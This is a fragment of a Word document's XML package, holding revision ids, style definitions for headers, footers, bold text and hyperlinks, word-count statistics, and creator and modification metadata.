    <w:rsid w:val="32A674FB"/>
    <w:rsid w:val="35BA15D4"/>
    <w:rsid w:val="3EB94B1E"/>
    <w:rsid w:val="43030A5E"/>
    <w:rsid w:val="48EE2191"/>
    <w:rsid w:val="663D4344"/>
    <w:rsid w:val="72AA4262"/>
    <w:rsid w:val="78BE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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="9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autoRedefine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7">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="15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11">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="10"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="12">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="10"/>
    <w:autoRedefine/>
    <w:qFormat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页眉 Char"/>
    <w:basedOn w:val="10"/>
    <w:link w:val="7"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="10"/>
    <w:link w:val="6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89ED565-0975-430B-99A3-994BAA2C77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1060</Words>
  <Characters>1352</Characters>
  <Paragraphs>61</Paragraphs>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1360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22737</dc:creator>
  <cp:lastModifiedBy>`</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-23T06:21:54Z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7B207074A5564667A366F4AEB461ACE3_13</vt:lpwstr>
  </property>
</Properties>
</file>